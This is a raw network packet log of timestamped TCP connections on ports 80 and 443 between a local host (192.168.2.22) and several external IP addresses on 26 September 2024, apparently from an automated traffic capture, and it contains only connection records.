                                                Sep 26, 2024 09:25:02.190907955 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190918922 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190936089 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.190999985 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.191040993 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242513895 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242554903 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242568016 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242615938 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242629051 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242645025 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242749929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242764950 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242778063 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242789030 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242799044 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242800951 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242810965 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242820024 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242821932 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242840052 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242841005 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242857933 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242873907 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.242939949 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.242973089 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243016958 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243033886 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243046999 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243052006 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243058920 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243067026 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243083000 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243094921 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243136883 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243148088 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243159056 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243169069 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243172884 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243186951 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243189096 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243199110 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243204117 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243211031 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243220091 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243235111 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243247986 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243375063 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243410110 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243421078 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243433952 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243444920 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243453026 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243457079 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.243469954 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243489027 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.243489027 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.270612955 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270633936 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270652056 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270669937 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270684958 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270704031 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270715952 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270728111 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.270868063 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271006107 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271034002 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271044016 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271048069 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271060944 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271076918 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271128893 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271141052 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271152973 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271163940 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271168947 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271183014 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271223068 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271228075 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271250963 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271259069 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271754026 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271796942 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271816969 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271828890 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271845102 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271863937 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271924019 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271935940 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271948099 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271959066 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.271959066 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.271996975 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272020102 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272046089 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272053957 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272722006 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272766113 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272779942 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272789955 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272814989 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272833109 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272835970 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272847891 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272860050 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272867918 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272886038 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272922039 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.272953033 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.272991896 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273003101 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273022890 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273036957 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273082018 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273092985 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273104906 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273113966 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273116112 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273128033 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273128033 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273145914 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273155928 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273226023 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273237944 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273272038 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273786068 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273818970 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273828983 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273828030 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273865938 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273865938 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273879051 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273895979 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273911953 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.273968935 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273979902 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.273992062 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.274060011 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.274060011 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.274147987 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.274859905 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.274908066 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.274918079 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.274928093 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.274952888 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.274960041 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.274971962 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.274990082 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275003910 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275054932 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275064945 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275077105 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275091887 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275106907 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275171041 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275180101 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275190115 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275202036 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275211096 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275227070 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275301933 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275312901 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275324106 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275335073 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.275338888 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275352955 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.275368929 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276011944 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276045084 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276052952 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276055098 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276072025 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276086092 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276144981 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276155949 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276166916 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276179075 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276180983 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276199102 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276211977 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276211977 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276236057 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276247978 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276263952 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276305914 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276316881 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276328087 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276340961 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276355982 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276356936 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276367903 CEST804916366.63.187.123192.168.2.22
                                                Sep 26, 2024 09:25:02.276386023 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.276400089 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:02.499166965 CEST4916380192.168.2.2266.63.187.123
                                                Sep 26, 2024 09:25:06.182035923 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:06.187170029 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:06.187593937 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:06.189268112 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:06.194164991 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:10.380408049 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:10.403357983 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:10.408251047 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:10.608175039 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:10.689042091 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:10.689090967 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:10.693283081 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:10.785774946 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:10.785808086 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:10.807351112 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:11.268371105 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.268445969 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.286464930 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.286475897 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.286761045 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.378366947 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.419394970 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.488410950 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.488492966 CEST44349165188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.488553047 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.491641998 CEST49165443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.511487007 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:11.516321898 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:11.716519117 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:11.719873905 CEST49166443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.719913960 CEST44349166188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.719971895 CEST49166443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.720539093 CEST49166443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:11.720547915 CEST44349166188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:11.914961100 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:12.174508095 CEST44349166188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:12.187623024 CEST49166443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:12.187644005 CEST44349166188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:12.311075926 CEST44349166188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:12.311160088 CEST44349166188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:12.311242104 CEST49166443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:12.312292099 CEST49166443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:12.510978937 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:12.516263008 CEST8049164132.226.247.73192.168.2.22
                                                Sep 26, 2024 09:25:12.516350985 CEST4916480192.168.2.22132.226.247.73
                                                Sep 26, 2024 09:25:12.535341978 CEST4916780192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:12.540297031 CEST8049167193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:12.540395975 CEST4916780192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:12.540491104 CEST4916780192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:12.545342922 CEST8049167193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:17.786223888 CEST8049167193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:17.834033012 CEST4916880192.168.2.22158.101.44.242
                                                Sep 26, 2024 09:25:17.838978052 CEST8049168158.101.44.242192.168.2.22
                                                Sep 26, 2024 09:25:17.839061022 CEST4916880192.168.2.22158.101.44.242
                                                Sep 26, 2024 09:25:17.839169025 CEST4916880192.168.2.22158.101.44.242
                                                Sep 26, 2024 09:25:17.843997002 CEST8049168158.101.44.242192.168.2.22
                                                Sep 26, 2024 09:25:17.999079943 CEST4916780192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:17.999521017 CEST8049167193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:17.999584913 CEST4916780192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:23.095289946 CEST8049168158.101.44.242192.168.2.22
                                                Sep 26, 2024 09:25:23.114032030 CEST49169443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:23.114087105 CEST44349169188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:23.114160061 CEST49169443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:23.114717007 CEST49169443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:23.114737034 CEST44349169188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:23.195626020 CEST8049168158.101.44.242192.168.2.22
                                                Sep 26, 2024 09:25:23.195712090 CEST4916880192.168.2.22158.101.44.242
                                                Sep 26, 2024 09:25:23.568140030 CEST44349169188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:23.572679043 CEST49169443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:23.572698116 CEST44349169188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:23.719105959 CEST44349169188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:23.719182968 CEST44349169188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:23.719279051 CEST49169443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:23.744251013 CEST49169443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:23.796840906 CEST4916880192.168.2.22158.101.44.242
                                                Sep 26, 2024 09:25:23.802136898 CEST8049168158.101.44.242192.168.2.22
                                                Sep 26, 2024 09:25:23.802262068 CEST4916880192.168.2.22158.101.44.242
                                                Sep 26, 2024 09:25:23.824848890 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:23.829715967 CEST8049170193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:23.829832077 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:23.830612898 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:23.835428953 CEST8049170193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:26.958578110 CEST8049170193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:26.977781057 CEST49171443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:26.977828026 CEST44349171188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:26.977925062 CEST49171443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:26.978286982 CEST49171443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:26.978301048 CEST44349171188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:27.171782017 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:27.497669935 CEST8049170193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:27.497750998 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:28.538409948 CEST8049170193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:28.538490057 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:28.541623116 CEST44349171188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:28.544926882 CEST49171443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:28.544939041 CEST44349171188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:28.691762924 CEST44349171188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:28.691889048 CEST44349171188.114.96.3192.168.2.22
                                                Sep 26, 2024 09:25:28.691958904 CEST49171443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:28.692528963 CEST49171443192.168.2.22188.114.96.3
                                                Sep 26, 2024 09:25:28.707751989 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:28.712954044 CEST8049170193.122.6.168192.168.2.22
                                                Sep 26, 2024 09:25:28.713071108 CEST4917080192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:28.742719889 CEST4917280192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:28.747714996 CEST8049172193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:28.747889996 CEST4917280192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:28.747968912 CEST4917280192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:28.752871990 CEST8049172193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:29.325105906 CEST8049172193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:29.350387096 CEST49173443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:29.350433111 CEST44349173188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:29.350507975 CEST49173443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:29.350894928 CEST49173443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:29.350908041 CEST44349173188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:29.535538912 CEST8049172193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:29.535660982 CEST4917280192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:29.810410023 CEST44349173188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:29.831290007 CEST49173443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:29.831315994 CEST44349173188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:29.958136082 CEST44349173188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:29.958357096 CEST44349173188.114.97.3192.168.2.22
                                                Sep 26, 2024 09:25:29.958416939 CEST49173443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:29.962743044 CEST49173443192.168.2.22188.114.97.3
                                                Sep 26, 2024 09:25:30.023704052 CEST4917280192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:30.028934956 CEST8049172193.122.130.0192.168.2.22
                                                Sep 26, 2024 09:25:30.029031992 CEST4917280192.168.2.22193.122.130.0
                                                Sep 26, 2024 09:25:30.064097881 CEST4917480192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:30.068969011 CEST8049174132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:30.069040060 CEST4917480192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:30.070146084 CEST4917480192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:30.075017929 CEST8049174132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:31.874126911 CEST8049174132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:31.929562092 CEST4917480192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:31.936410904 CEST8049174132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:31.936502934 CEST4917480192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:32.054452896 CEST4917580192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:32.059376001 CEST8049175132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:32.059462070 CEST4917580192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:32.059623003 CEST4917580192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:32.064660072 CEST8049175132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:35.570316076 CEST8049175132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:35.779557943 CEST8049175132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:35.779658079 CEST4917580192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:36.179703951 CEST4917580192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:36.185060024 CEST8049175132.226.8.169192.168.2.22
                                                Sep 26, 2024 09:25:36.185133934 CEST4917580192.168.2.22132.226.8.169
                                                Sep 26, 2024 09:25:36.494524956 CEST4917680192.168.2.22193.122.6.168
                                                Sep 26, 2024 09:25:36.499624014 CEST8049176193.122.6.168192.168.2.22
